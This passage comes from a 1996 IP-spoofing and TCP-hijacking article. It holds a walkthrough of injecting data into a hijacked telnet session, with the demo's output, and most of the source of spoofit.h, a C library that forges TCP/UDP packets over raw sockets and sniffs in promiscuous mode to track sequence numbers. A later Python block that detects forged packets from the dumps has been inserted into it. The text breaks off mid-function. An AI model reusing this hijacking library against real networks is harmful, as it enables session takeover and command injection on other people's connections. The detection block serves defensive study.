                SERVER,23,serv_ack,serv_seq,ACK|PSH);

   Pretty clear....

8) while(count<5)
     {
     wait_packet(fd_receive,&attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0);
     if(attack_info.ack==serv_ack+sizeof(evil_data))
       count=PERSONAL_TOUCH;
     else count++;
     };

   and again waiting for confirmation.

NOTE after the above attack, hijack had produced the following output:

Starting Hijacking demo - Brecht Claerhout 1996
-----------------------------------------------
Takeover phase 1: Stealing connection.
  Sending Spoofed clean-up data...
  Waiting for spoof to be confirmed...
Phase 1 ended.
Takeover phase 2: Getting on track with SEQ/ACK's again
  Server SEQ: C34A680B (hex)   ACK: 5C8223F5 (hex)
Phase 2 ended.
Takeover phase 3: Sending MY data.
  Sending evil data.
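The SEQ/ACK bookkeeping of 4.3.2 and 4.4 can be checked from the Sniffit dumps themselves. The Python below is an added example (not part of Dr_Sp00f's package): it decodes the IP/TCP headers of three dumps copied from the article, re-derives the "SEQ + datalength" arithmetic, and then applies the consistency check a passive monitor on the same segment can use: the injected packet of hijack step 4 is sequence-perfect, but its TTL and DF bit differ from the client's own packets because a different host built it. Addresses are decoded from the hex as captured (so they differ from the renumbered ones in the summaries); the flow key, the anomaly reasons and the TTL/DF/IP-ID heuristic are my own choices.

```python
"""Parse the Sniffit hex dumps from the article and check a flow for
sender consistency.  Added example; not part of Dr_Sp00f's package."""
import struct
from dataclasses import dataclass

# Three dumps copied verbatim from the article: the packet before the FIN
# kill (4.3.2 step 1), the client's keystroke (4.4 step 1) and the injected
# clean-up data (4.4 step 4).  Sniffit prints "XX g" pairs: byte, glyph.
FIN_STEP1 = r"""
45 E 00 . 00 . 2A * 30 0 5E ^ 40 @ 00 . 40 @ 06 . 5E ^ AD . 9D . C1 . 45 E 33 3
9D . C1 . 2B + 0D . 00 . 17 . 04 . 30 0 19 . C6 . B9 . 8B . 69 i C5 . 47 G 3E >
50 P 18 . 34 4 00 . 3A : 61 a 00 . 00 . 0D . 0A .
"""
HIJ_STEP1 = r"""
45 E 00 . 00 . 29 ) CA . F3 . 40 @ 00 . 40 @ 06 . C5 . 0E . 9D . C1 . 45 E 3F ?
9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # EA . C3 . 4A J 67 g F6 .
50 P 18 . 7C | 00 . 6D m 29 ) 00 . 00 . 6C l
"""
HIJ_STEP4 = r"""
45 E 00 . 00 . 32 2 31 1 01 . 00 . 00 . 45 E 06 . 99 . F8 . 9D . C1 . 45 E 3F ?
9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # EB . C3 . 4A J 67 g F6 .
50 P 18 . 7C | 00 . AE . F5 . 00 . 00 . 08 . 08 . 08 . 08 . 08 . 08 . 08 . 08 .
0A . 0A .
"""

HEXDIGITS = set("0123456789ABCDEFabcdef")


def dump_to_bytes(dump: str) -> bytes:
    """Keep only the two-digit hex tokens; the glyph column is one char wide."""
    return bytes(int(t, 16) for t in dump.split()
                 if len(t) == 2 and set(t) <= HEXDIGITS)


def ip_checksum(header: bytes) -> int:
    """RFC 791 one's-complement sum; 0 over a header whose checksum is valid."""
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


@dataclass
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    ip_id: int
    df: bool
    ttl: int
    ip_cksum_ok: bool
    seq: int
    ack: int
    flags: str        # Sniffit's UAPRSF column, e.g. "-AP---"
    window: int
    datalen: int


def parse_packet(raw: bytes) -> Packet:
    """Decode an IPv4 header followed by a TCP header (no option handling needed here)."""
    ihl = (raw[0] & 0x0F) * 4
    total_len, ip_id, frag, ttl, proto = struct.unpack("!HHHBB", raw[2:10])
    if proto != 6:
        raise ValueError("not a TCP packet")
    src = ".".join(str(b) for b in raw[12:16])
    dst = ".".join(str(b) for b in raw[16:20])
    tcp = raw[ihl:total_len]
    sport, dport, seq, ack, off_flags, window = struct.unpack("!HHIIHH", tcp[:16])
    doff = (off_flags >> 12) * 4
    bits = off_flags & 0x3F
    flags = "".join(letter if bits & mask else "-"
                    for letter, mask in zip("UAPRSF", (0x20, 0x10, 0x08, 0x04, 0x02, 0x01)))
    return Packet(src, sport, dst, dport, ip_id, bool(frag & 0x4000), ttl,
                  ip_checksum(raw[:ihl]) == 0, seq, ack, flags, window,
                  len(tcp) - doff)


def next_seq(p: Packet) -> int:
    """SEQ the sender uses next (the article's 'SEQ + datalength', e.g. 19C6B98B + 2)."""
    return (p.seq + p.datalen) & 0xFFFFFFFF


def flow_anomalies(packets):
    """Compare each packet with the first one seen in the same direction of the
    same connection.  A forgery can copy SEQ/ACK exactly, but it is built by
    another host, so TTL, DF bit and IP ID progression usually give it away."""
    baseline = {}
    findings = []
    for i, p in enumerate(packets):
        reasons = []
        if not p.ip_cksum_ok:
            reasons.append("bad IP checksum")
        b = baseline.setdefault((p.src, p.sport, p.dst, p.dport), p)
        if b is not p:
            if p.ttl != b.ttl:
                reasons.append("ttl %d->%d" % (b.ttl, p.ttl))
            if p.df != b.df:
                reasons.append("DF bit changed")
            if p.ip_id == b.ip_id:
                reasons.append("IP ID repeated")
        if reasons:
            findings.append((i, reasons))
    return findings


if __name__ == "__main__":
    for name, dump in (("FIN step 1", FIN_STEP1), ("hijack 1", HIJ_STEP1), ("hijack 4", HIJ_STEP4)):
        p = parse_packet(dump_to_bytes(dump))
        print("%-10s %s.%d-%s.%d SEQ %08X ACK %08X %s ttl=%d df=%s data=%d"
              % (name, p.src, p.sport, p.dst, p.dport, p.seq, p.ack, p.flags, p.ttl, p.df, p.datalen))
    print(flow_anomalies([parse_packet(dump_to_bytes(d)) for d in (HIJ_STEP1, HIJ_STEP4)]))
```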
  Waiting for evil data to be confirmed...
Phase 3 ended.

4.5 Other
---------

This list is far from complete; I'm sure you can think of other nice things to do with this information. Think, experiment and code!

5. The source code
------------------

---=[ spoofit.h ]=------------------------------------------------------------

/**************************************************************************/
/* Spoofit.h - Include file for easy creating of spoofed TCP packets      */
/*             Requires LINUX 1.3.x (or later) Kernel                     */
/*             (illustration for 'A short overview of IP spoofing')       */
/*             V.1 - Copyright 1996 - Brecht Claerhout                    */
/*                                                                        */
/* Purpose    - Providing skilled people with an easy to use spoofing     */
/*              source. I used it to be able to write my tools fast and   */
/*              short. Mind you this is only illustrative and can be      */
/*              easily optimised.                                         */
/*                                                                        */
/* Author     - Dr_Sp00f (Himself)                                        */
/*              Serious advice, comments, statements, greets, always      */
/*              welcome; flames, moronic 3l33t >/dev/null                 */
/*                                                                        */
/* Disclaimer - This file is for educational purposes only. I am in       */
/*              NO way responsible for what you do with this file,        */
/*              or any damage you or this file causes.                    */
/*                                                                        */
/* For whom   - People with a little knowledge of TCP/IP, C source code   */
/*              and general UNIX. Otherwise, please keep your hands off,  */
/*              and catch up on those things first.                       */
/*                                                                        */
/* Limited to - Linux 1.3.X or higher.                                    */
/*              If you know a little about your OS, shouldn't be too hard */
/*              to port.                                                  */
/*                                                                        */
/* Important note - You might have noticed I use non standard packet      */
/*              header structs. How come?? Because I started like         */
/*              that on Sniffit because I wanted to do the                */
/*              bittransforms myself.                                     */
/*              Well I got so damned used to them, I keep using them;     */
/*              they are not very different, and not hard to use, so      */
/*              you'll easily use my structs without any problem;         */
/*              this code and the examples show how to use them.          */
/*              My apologies for this inconvenience.
 */
/*
 * None of this code can be used in commercial software. You are free to
 * use it in any other non-commercial software (modified or not) as long
 * as you give me the credits for it. You can spread this include file,
 * but keep it unmodified.
 *
 * Easiest way to understand this library is to look at the use of it in
 * the example progs.
 *
 **** Sending packets ******************************************************
 *
 * int open_sending (void)
 *     Returns a filedescriptor to the sending socket.
 *     Close it with close (int filedesc).
 *
 * void transmit_TCP (int sp_fd, char *sp_data,
 *                    int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen,
 *                    char *sp_source, unsigned short sp_source_port,
 *                    char *sp_dest, unsigned short sp_dest_port,
 *                    unsigned long sp_seq, unsigned long sp_ack,
 *                    unsigned short sp_flags)
 *     Fire data away in a TCP packet.
 *     sp_fd   : raw socket filedesc.
 *     sp_data : IP options (you should do the padding)
 *               TCP options (you should do the padding)
 *               data to be transmitted
 *               (NULL is nothing)
 *               Note that all of this is optional, and IP and TCP options
 *               are not often used.
 *               All data is put after each other in one buffer.
 */
/*
 *     sp_ipoptlen   : length of IP options (in bytes)
 *     sp_tcpoptlen  : length of TCP options (in bytes)
 *     sp_datalen    : amount of data to be transmitted (bytes)
 *     sp_source     : spoofed host that "sends packet"
 *     sp_source_port: spoofed port that "sends packet"
 *     sp_dest       : host that should receive packet
 *     sp_dest_port  : port that should receive packet
 *     sp_seq        : sequence number of packet
 *     sp_ack        : ACK of packet
 *     sp_flags      : flags of packet (URG,ACK,PSH,RST,SYN,FIN)
 *
 * void transmit_UDP (int sp_fd, char *sp_data,
 *                    int sp_ipoptlen, int sp_datalen,
 *                    char *sp_source, unsigned short sp_source_port,
 *                    char *sp_dest, unsigned short sp_dest_port)
 *     Fire data away in a UDP packet.
 *     sp_fd   : raw socket filedesc.
 *     sp_data : IP options
 *               data to be transmitted
 *               (NULL if none)
 *     sp_ipoptlen   : length of IP options (in bytes)
 *     sp_datalen    : amount of data to be transmitted
 *     sp_source     : spoofed host that "sends packet"
 *     sp_source_port: spoofed port that "sends packet"
 *     sp_dest       : host that should receive packet
 *     sp_dest_port  : port that should receive packet
 *
 **** Receiving packets ****************************************************
 *
 * int open_receiving (char *rc_device, char mode)
 *     Returns fdesc to a receiving socket.
 *     (if mode is IO_HANDLE don't call this twice; the global var
 *      rc_fd_abc123 is initialised)
 *     rc_device: the device to use, e.g. "eth0", "ppp0"
 *                be sure to change DEV_PREFIX accordingly!
 */
/*
 *                DEV_PREFIX is the length in bytes of the header that
 *                comes with a SOCKET_PACKET due to the network device.
 *     mode: 0: normal mode, blocking (read will wait till a packet
 *              comes; mind you, we are in PROMISC mode)
 *           IO_NONBLOCK: non-blocking mode (read will not wait;
 *              useful for active polling)
 *           IO_HANDLE: installs the signal handler that updates SEQ,ACK,..
 *              (IO_HANDLE is not recommended to use, as it should be
 *              modified according to your own use, and it works badly on
 *              heavy-traffic continuous monitoring. I needed it once, but
 *              left it in so you can have a look at signal-handled IO;
 *              personally I would have removed it, but some thought it
 *              doesn't do any harm anyway, so why remove...)
 *              (I'm not giving any more info on IO_HANDLE as it is not
 *              needed for the example programs, and interested people can
 *              easily figure the code out themselves.)
 *              (Besides, IO_HANDLE can only be called ONCE in a program,
 *              the other modes multiple times.)
 *
 * int get_packet (int rc_fd, char *buffer, int *TCP_UDP_start,
 *                 unsigned char *proto)
 *     This waits for a packet (mode default) and puts it in buffer, or
 *     returns whether there is a packet or not (IO_NONBLOCK).
 *     It returns the packet length if there is one available, else 0.
 *
 * int wait_packet(int wp_fd, struct sp_wait_packet *ret_values,
 *                 char *wp_source, unsigned short wp_source_port,
 *                 char *wp_dest, unsigned short wp_dest_port,
 *                 int wp_flags, int wait_time);
 *     wp_fd: a receiving socket (default or IO_NONBLOCK)
 *     ret_values: pointer to a sp_wait_packet struct, that contains SEQ,
 *                 ACK, flags, datalen of that packet. For further packet
 *                 handling see the examples.
 */
/*
 *         struct sp_wait_packet {
 *             unsigned long seq,ack;
 *             unsigned short flags;
 *             int datalen;
 *         };
 *     wp_source, wp_source_port : sender of packet
 *     wp_dest, wp_dest_port     : receiver of packet
 *     wp_flags: flags that should be present in packet (mind you, there
 *               could be more present, so check on return)
 *               note: if you don't care about flags, use 0
 *     wait_time: if not zero, this function will return -1 if no correct
 *                packet has arrived within wait_time secs.
 *                (only works on an IO_NONBLOCK socket)
 *
 * void set_filter (char *f_source, unsigned short f_source_port,
 *                  char *f_dest, unsigned short f_dest_port)
 *     (for use with IO_HANDLE)
 *     Start the program to watch all traffic from source/port to
 *     dest/port. This enables the updating of global data. Can be
 *     called multiple times.
 *
 * void close_receiving (void)
 *     When you opened an IO_HANDLE mode receiving socket, close it with
 *     this.
 *
 **** Global DATA (IO_HANDLE mode) *****************************************
 *
 * When accessing global data, copy the values to local vars and then use
 * them. Reduce access time to a minimum.
 * Mind you, use of this is very limited; if you are a novice on IO, just
 * ignore it, the other functions are good enough! If not, rewrite the
 * handler for your own use...
 *
 * sig_atomic_t SP_DATA_BUSY
 *     Put this on NON-ZERO when accessing global data. Incoming
 *     packets will be ignored then, so data can not be overwritten.
 *
 * unsigned long int CUR_SEQ, CUR_ACK;
 *     Last recorded SEQ and ACK number of the filtered "stream".
 *     Before accessing this data set SP_DATA_BUSY non-zero,
 *     afterward set it back to zero.
 */
/*
 * unsigned long int CUR_COUNT;
 *     Increased every time other data is updated.
 *
 * unsigned int CUR_DATALEN;
 *     Length of data in last TCP packet.
 */
/**************************************************************************/

#include "sys/socket.h"          /* includes, what would we do without them */
#include "netdb.h"
#include "stdlib.h"
#include "unistd.h"
#include "stdio.h"
#include "errno.h"
#include "netinet/in.h"
#include "netinet/ip.h"
#include "linux/if.h"
#include "sys/ioctl.h"
#include "sys/types.h"
#include "signal.h"
#include "fcntl.h"
#include "string.h"              /* memcpy, strcpy, strcmp: missing from the original list */
#include "strings.h"             /* bzero, bcopy */
#include "ctype.h"               /* isdigit */
#include "arpa/inet.h"           /* inet_addr */

#undef DEBUG

#define IP_VERSION 4             /* keep y'r hands off... */
#define MTU 1500
#define IP_HEAD_BASE 20          /* using fixed lengths to send */
#define TCP_HEAD_BASE 20         /* no options etc... */
#define UDP_HEAD_BASE 8          /* Always fixed */
#define IO_HANDLE 1
#define IO_NONBLOCK 2

int DEV_PREFIX = 9999;
sig_atomic_t WAIT_PACKET_WAIT_TIME=0;

/**** IO_HANDLE ************************************************************/
int rc_fd_abc123;
sig_atomic_t RC_FILTSET=0;
char rc_filter_string[50];       /* x.x.x.x.p-y.y.y.y.g */
sig_atomic_t SP_DATA_BUSY=0;
unsigned long int CUR_SEQ=0, CUR_ACK=0, CUR_COUNT=0;
unsigned int CUR_DATALEN;
unsigned short CUR_FLAGS;
/***************************************************************************/

struct sp_wait_packet
  {
  unsigned long seq,ack;
  unsigned short flags;
  int datalen;
  };

/* Code from Sniffit - BTW my own program....
   no copyright violation here */
#define URG 32                   /* TCP flags */
#define ACK 16
#define PSH 8
#define RST 4
#define SYN 2
#define FIN 1

struct PACKET_info
  {
  int len, datalen;
  unsigned long int seq_nr, ACK_nr;
  u_char FLAGS;
  };

struct IP_header                      /* The IP header (without options) */
  {
  unsigned char verlen, type;
  unsigned short length, ID, flag_offset;
  unsigned char TTL, protocol;
  unsigned short checksum;
  unsigned long int source, destination;
  };

struct TCP_header                     /* The TCP header (without options) */
  {
  unsigned short source, destination;
  unsigned long int seq_nr, ACK_nr;
  unsigned short offset_flag, window, checksum, urgent;
  };

struct UDP_header                     /* The UDP header */
  {
  unsigned short source, destination;
  unsigned short length, checksum;
  };

struct pseudo_IP_header               /* The pseudo IP header (checksum calc) */
  {
  unsigned long int source, destination;
  char zero_byte, protocol;
  unsigned short TCP_UDP_len;
  };

/* data structure for argument passing */
struct sp_data_exchange
  {
  int fd;                             /* Sh!t from transmit_TCP */
  char *data;
  int datalen;
  char *source;
  unsigned short source_port;
  char *dest;
  unsigned short dest_port;
  unsigned long seq, ack;
  unsigned short flags;
  char *buffer;                       /* work buffer */
  int IP_optlen;                      /* IP options length in bytes */
  int TCP_optlen;                     /* TCP options length in bytes */
  };

/**************** all functions *******************************************/
void transmit_TCP (int fd, char *sp_data, int sp_ipoptlen, int sp_tcpoptlen,
                   int sp_datalen, char *sp_source,
                   unsigned short sp_source_port, char *sp_dest,
                   unsigned short sp_dest_port, unsigned long sp_seq,
                   unsigned long sp_ack, unsigned short sp_flags);
void transmit_UDP (int sp_fd, char *sp_data, int ipoptlen, int sp_datalen,
                   char *sp_source, unsigned short sp_source_port,
                   char *sp_dest, unsigned short sp_dest_port);
int get_packet (int rc_fd, char *buffer, int *, unsigned char*);
int wait_packet(int,struct sp_wait_packet *,char *, unsigned short,char *,
                unsigned short, int, int);
static unsigned long
sp_getaddrbyname(char *);
int open_sending (void);
int open_receiving (char *, char);
void close_receiving (void);
void sp_send_packet (struct sp_data_exchange *, unsigned char);
void sp_fix_TCP_packet (struct sp_data_exchange *);
void sp_fix_UDP_packet (struct sp_data_exchange *);
void sp_fix_IP_packet (struct sp_data_exchange *, unsigned char);
unsigned short in_cksum(unsigned short *, int );
void rc_sigio (int);
void set_filter (char *, unsigned short, char *, unsigned short);

/********************* let the games commence ****************************/

static unsigned long sp_getaddrbyname(char *sp_name)
{
  struct hostent *sp_he;
  int i;

  if(isdigit(*sp_name))
    return inet_addr(sp_name);
  for(i=0;i<100;i++)
    {
    if(!(sp_he = gethostbyname(sp_name)))
      {
      printf("WARNING: gethostbyname failure!\n");
      sleep(1);
      if(i>=3)              /* always a retry here in this kind of application */
        printf("Couldn't resolve hostname."), exit(1);
      }
    else break;
    }
  return sp_he ? *(long*)*sp_he->h_addr_list : 0;
}

int open_sending (void)
{
  struct protoent *sp_proto;
  int sp_fd;
  int dummy=1;

  /* they don't come rawer */
  if ((sp_fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))==-1)
    perror("Couldn't open Socket."), exit(1);
#ifdef DEBUG
  printf("Raw socket ready\n");
#endif
  return sp_fd;
}

void sp_send_packet (struct sp_data_exchange *sp, unsigned char proto)
{
  int sp_status;
  struct sockaddr_in sp_server;
  struct hostent *sp_help;
  int HEAD_BASE;

  /* Construction of destination */
  bzero((char *)&sp_server, sizeof(struct sockaddr));
  sp_server.sin_family = AF_INET;
  sp_server.sin_addr.s_addr = inet_addr(sp->dest);
  if (sp_server.sin_addr.s_addr == (unsigned int)-1)  /* if target not in DOT/number notation */
    {
    if (!(sp_help=gethostbyname(sp->dest)))
      fprintf(stderr,"unknown host %s\n", sp->dest), exit(1);
    bcopy(sp_help->h_addr, (caddr_t)&sp_server.sin_addr, sp_help->h_length);
    };

  switch(proto)
    {
    case 6: HEAD_BASE = TCP_HEAD_BASE; break;    /* TCP */
    case 17: HEAD_BASE = UDP_HEAD_BASE; break;   /* UDP */
    default: exit(1); break;
    };
  sp_status = sendto(sp->fd, (char *)(sp->buffer),
                     sp->datalen+HEAD_BASE+IP_HEAD_BASE+sp->IP_optlen, 0,
                     (struct sockaddr *)&sp_server,sizeof(struct sockaddr));
  if (sp_status < 0 || sp_status != sp->datalen+HEAD_BASE+IP_HEAD_BASE+sp->IP_optlen)
    {
    if (sp_status < 0) perror("Sendto"), exit(1);
    /* report against the full length we asked sendto() for */
    printf("hmm... Only transmitted %d of %d bytes.\n", sp_status,
           sp->datalen+HEAD_BASE+IP_HEAD_BASE+sp->IP_optlen);
    };
#ifdef DEBUG
  printf("Packet transmitted...\n");
#endif
}

void sp_fix_IP_packet (struct sp_data_exchange *sp, unsigned char proto)
{
  struct IP_header *sp_help_ip;
  int HEAD_BASE;

  switch(proto)
    {
    case 6: HEAD_BASE = TCP_HEAD_BASE; break;    /* TCP */
    case 17: HEAD_BASE = UDP_HEAD_BASE; break;   /* UDP */
    default: exit(1); break;
    };

  sp_help_ip = (struct IP_header *) (sp->buffer);
  sp_help_ip->verlen = (IP_VERSION << 4) | ((IP_HEAD_BASE+sp->IP_optlen)/4);
  sp_help_ip->type = 0;
  sp_help_ip->length = htons(IP_HEAD_BASE+HEAD_BASE+sp->datalen+sp->IP_optlen+sp->TCP_optlen);
  sp_help_ip->ID = htons(12545);                  /* TEST */
  sp_help_ip->flag_offset = 0;
  sp_help_ip->TTL = 69;
  sp_help_ip->protocol = proto;
  sp_help_ip->source = sp_getaddrbyname(sp->source);
  sp_help_ip->destination = sp_getaddrbyname(sp->dest);
  sp_help_ip->checksum=in_cksum((unsigned short *) (sp->buffer),
                                IP_HEAD_BASE+sp->IP_optlen);
#ifdef DEBUG
  printf("IP header fixed...\n");
#endif
}

void sp_fix_TCP_packet (struct sp_data_exchange *sp)
{
  char sp_pseudo_ip_construct[MTU];
  struct TCP_header *sp_help_tcp;
  struct pseudo_IP_header *sp_help_pseudo;
  int i;

  /* The zeroing loop and the sp_help_tcp assignment were eaten by the
     '<' in the published text; both are reconstructed from context. */
  for(i=0;i<MTU;i++) sp_pseudo_ip_construct[i]=0;
  sp_help_tcp = (struct TCP_header *) (sp->buffer+IP_HEAD_BASE+sp->IP_optlen);
  sp_help_pseudo = (struct pseudo_IP_header *) sp_pseudo_ip_construct;

  sp_help_tcp->offset_flag = htons( (((TCP_HEAD_BASE+sp->TCP_optlen)/4)<<12) | sp->flags);
  sp_help_tcp->seq_nr = htonl(sp->seq);
  sp_help_tcp->ACK_nr = htonl(sp->ack);
  sp_help_tcp->source = htons(sp->source_port);
  sp_help_tcp->destination = htons(sp->dest_port);
  sp_help_tcp->window = htons(0x7c00);            /* dummy for now 'wujx' */

  sp_help_pseudo->source = sp_getaddrbyname(sp->source);
  sp_help_pseudo->destination = sp_getaddrbyname(sp->dest);
  sp_help_pseudo->zero_byte = 0;
  sp_help_pseudo->protocol = 6;
  sp_help_pseudo->TCP_UDP_len = htons(sp->datalen+TCP_HEAD_BASE+sp->TCP_optlen);

  /* pseudo header (12 bytes) followed by the TCP segment, then checksum it all */
  memcpy(sp_pseudo_ip_construct+12, sp_help_tcp, sp->TCP_optlen+sp->datalen+TCP_HEAD_BASE);
  sp_help_tcp->checksum=in_cksum((unsigned short *) sp_pseudo_ip_construct,
                                 sp->datalen+12+TCP_HEAD_BASE+sp->TCP_optlen);
#ifdef DEBUG
  printf("TCP header fixed...\n");
#endif
}

void transmit_TCP (int sp_fd, char *sp_data,
                   int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen,
                   char *sp_source, unsigned short sp_source_port,
                   char *sp_dest, unsigned short sp_dest_port,
                   unsigned long sp_seq, unsigned long sp_ack,
                   unsigned short sp_flags)
{
  char sp_buffer[1500];
  struct sp_data_exchange sp_struct;

  bzero(sp_buffer,1500);
  if (sp_ipoptlen!=0)
    memcpy(sp_buffer+IP_HEAD_BASE,sp_data,sp_ipoptlen);
  if (sp_tcpoptlen!=0)
    memcpy(sp_buffer+IP_HEAD_BASE+TCP_HEAD_BASE+sp_ipoptlen,
           sp_data+sp_ipoptlen,sp_tcpoptlen);
  if (sp_datalen!=0)
    memcpy(sp_buffer+IP_HEAD_BASE+TCP_HEAD_BASE+sp_ipoptlen+sp_tcpoptlen,
           sp_data+sp_ipoptlen+sp_tcpoptlen,sp_datalen);

  sp_struct.fd = sp_fd;
  sp_struct.data = sp_data;
  sp_struct.datalen = sp_datalen;
  sp_struct.source = sp_source;
  sp_struct.source_port = sp_source_port;
  sp_struct.dest = sp_dest;
  sp_struct.dest_port = sp_dest_port;
  sp_struct.seq = sp_seq;
  sp_struct.ack = sp_ack;
  sp_struct.flags = sp_flags;
  sp_struct.buffer = sp_buffer;
  sp_struct.IP_optlen = sp_ipoptlen;
  sp_struct.TCP_optlen = sp_tcpoptlen;

  sp_fix_TCP_packet(&sp_struct);
  sp_fix_IP_packet(&sp_struct, 6);
  sp_send_packet(&sp_struct, 6);
}

void sp_fix_UDP_packet (struct sp_data_exchange *sp)
{
  char sp_pseudo_ip_construct[MTU];
  struct UDP_header *sp_help_udp;
  struct pseudo_IP_header *sp_help_pseudo;
  int i;

  /* reconstructed from context, exactly as in sp_fix_TCP_packet */
  for(i=0;i<MTU;i++) sp_pseudo_ip_construct[i]=0;
  sp_help_udp = (struct UDP_header *) (sp->buffer+IP_HEAD_BASE+sp->IP_optlen);
  sp_help_pseudo = (struct pseudo_IP_header *) sp_pseudo_ip_construct;

  sp_help_udp->source = htons(sp->source_port);
  sp_help_udp->destination = htons(sp->dest_port);
  sp_help_udp->length = htons(sp->datalen+UDP_HEAD_BASE);

  sp_help_pseudo->source = sp_getaddrbyname(sp->source);
  sp_help_pseudo->destination = sp_getaddrbyname(sp->dest);
  sp_help_pseudo->zero_byte = 0;
  sp_help_pseudo->protocol = 17;
  sp_help_pseudo->TCP_UDP_len = htons(sp->datalen+UDP_HEAD_BASE);

  memcpy(sp_pseudo_ip_construct+12, sp_help_udp, sp->datalen+UDP_HEAD_BASE);
  sp_help_udp->checksum=in_cksum((unsigned short *) sp_pseudo_ip_construct,
                                 sp->datalen+12+UDP_HEAD_BASE);
#ifdef DEBUG
  printf("UDP header fixed...\n");
#endif
}

void transmit_UDP (int sp_fd, char *sp_data,
                   int sp_ipoptlen, int sp_datalen,
                   char *sp_source, unsigned short sp_source_port,
                   char *sp_dest, unsigned short sp_dest_port)
{
  char sp_buffer[1500];
  struct sp_data_exchange sp_struct;

  bzero(sp_buffer,1500);
  if (sp_ipoptlen!=0)
    memcpy(sp_buffer+IP_HEAD_BASE,sp_data,sp_ipoptlen);
  if (sp_data!=NULL)
    memcpy(sp_buffer+IP_HEAD_BASE+UDP_HEAD_BASE+sp_ipoptlen,
           sp_data+sp_ipoptlen,sp_datalen);

  sp_struct.fd = sp_fd;
  sp_struct.data = sp_data;
  sp_struct.datalen = sp_datalen;
  sp_struct.source = sp_source;
  sp_struct.source_port = sp_source_port;
  sp_struct.dest = sp_dest;
  sp_struct.dest_port = sp_dest_port;
  sp_struct.buffer = sp_buffer;
  sp_struct.IP_optlen = sp_ipoptlen;
  sp_struct.TCP_optlen = 0;

  sp_fix_UDP_packet(&sp_struct);
  sp_fix_IP_packet(&sp_struct, 17);
  sp_send_packet(&sp_struct, 17);
}

/* This routine stolen from ping.c -- HAHAHA!*/
unsigned short in_cksum(unsigned short *addr,int len)
{
  register int nleft = len;
  register unsigned short *w = addr;
  register int sum = 0;
  unsigned short answer = 0;

  while (nleft > 1)
    {
    sum += *w++;
    nleft -= 2;
    }
  if (nleft == 1)
    {
    *(u_char *)(&answer) = *(u_char *)w ;
    sum += answer;
    }
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return(answer);
}

/************************* Receiving department ****************************/

int open_receiving (char *rc_device, char mode)
{
  int or_fd;
  struct sigaction rc_sa;
  int fcntl_flag;
  struct ifreq ifinfo;
  char test;
  /* create snoop socket and set interface promisc */
  if ((or_fd = socket(AF_INET, SOCK_PACKET, htons(0x3)))==-1)
    perror("Couldn't open Socket."), exit(1);
  strcpy(ifinfo.ifr_ifrn.ifrn_name,rc_device);
  if(ioctl(or_fd,SIOCGIFFLAGS,&ifinfo)<0)
    perror("Couldn't get flags."), exit(1);
  ifinfo.ifr_ifru.ifru_flags |= IFF_PROMISC;
  if(ioctl(or_fd,SIOCSIFFLAGS,&ifinfo)<0)
    perror("Couldn't set flags. (PROMISC)"), exit(1);

  if(mode&IO_HANDLE)
    {
    /* install handler */
    rc_sa.sa_handler=rc_sigio;            /* we don't use signal() */
    sigemptyset(&rc_sa.sa_mask);          /* because the timing window is */
    rc_sa.sa_flags=0;                     /* too big... */
    sigaction(SIGIO,&rc_sa,NULL);
    }

  if(fcntl(or_fd,F_SETOWN,getpid())<0)
    perror("Couldn't set ownership"), exit(1);

  if(mode&IO_HANDLE)
    {
    if( (fcntl_flag=fcntl(or_fd,F_GETFL,0))<0)
      perror("Couldn't get FLAGS"), exit(1);
    if(fcntl(or_fd,F_SETFL,fcntl_flag|FASYNC|FNDELAY)<0)
      perror("Couldn't set FLAGS"), exit(1);
    rc_fd_abc123=or_fd;
    }
  else
    {
    if(mode&IO_NONBLOCK)
      {
      if( (fcntl_flag=fcntl(or_fd,F_GETFL,0))<0)
        perror("Couldn't get FLAGS"), exit(1);
      if(fcntl(or_fd,F_SETFL,fcntl_flag|FNDELAY)<0)
        perror("Couldn't set FLAGS"), exit(1);
      };
    };
#ifdef DEBUG
  printf("Reading socket ready\n");
#endif
  return or_fd;
}

/* returns 0 when no packet read!
 */
int get_packet (int rc_fd, char *buffer, int *TCP_UDP_start,unsigned char *proto)
{
  char help_buffer[MTU];
  int pack_len;
  struct IP_header *gp_IPhead;

  pack_len = read(rc_fd,help_buffer,1500);
  if(pack_len<0)
    {
    if(errno==EWOULDBLOCK) {pack_len=0;}
    else {perror("Read error:"); exit(1);}
    };
  if(pack_len>0)
    {
    /* strip the link-layer header (DEV_PREFIX bytes) so buffer starts at IP */
    pack_len -= DEV_PREFIX;
    memcpy(buffer,help_buffer+DEV_PREFIX,pack_len);
    gp_IPhead = (struct IP_header *) buffer;
    if(proto != NULL) *proto = gp_IPhead->protocol;
    if(TCP_UDP_start != NULL) *TCP_UDP_start = (gp_IPhead->verlen & 0xF) << 2;
    }
  return pack_len;
}

void wait_packet_timeout (int sig)
{
  alarm(0);
  WAIT_PACKET_WAIT_TIME=1;
}

int wait_packet(int wp_fd,struct sp_wait_packet *ret_values,
                char *wp_source, unsigned short wp_source_port,
                char *wp_dest, unsigned short wp_dest_port,
                int wp_flags, int wait_time)
{
  char wp_buffer[1500];
  struct IP_header *wp_iphead;
  struct TCP_header *wp_tcphead;
  unsigned long wp_sourcel, wp_destl;
  int wp_tcpstart;
  unsigned char wp_proto;             /* get_packet() stores an unsigned char here */

  wp_sourcel=sp_getaddrbyname(wp_source);
  wp_destl=sp_getaddrbyname(wp_dest);

  WAIT_PACKET_WAIT_TIME=0;
  if(wait_time!=0)
    {
    signal(SIGALRM,wait_packet_timeout);
    alarm(wait_time);
    }

  while(1)
    {
    while(get_packet(wp_fd, wp_buffer, &wp_tcpstart, &wp_proto)<=0)
      {
      if (WAIT_PACKET_WAIT_TIME!=0) {alarm(0); return -1;}
      };
    if(wp_proto == 6)
      {
      wp_iphead= (struct IP_header *) wp_buffer;
      wp_tcphead= (struct TCP_header *) (wp_buffer+wp_tcpstart);
      if( (wp_sourcel==wp_iphead->source)&&(wp_destl==wp_iphead->destination) )
        {
        if( (ntohs(wp_tcphead->source)==wp_source_port) &&
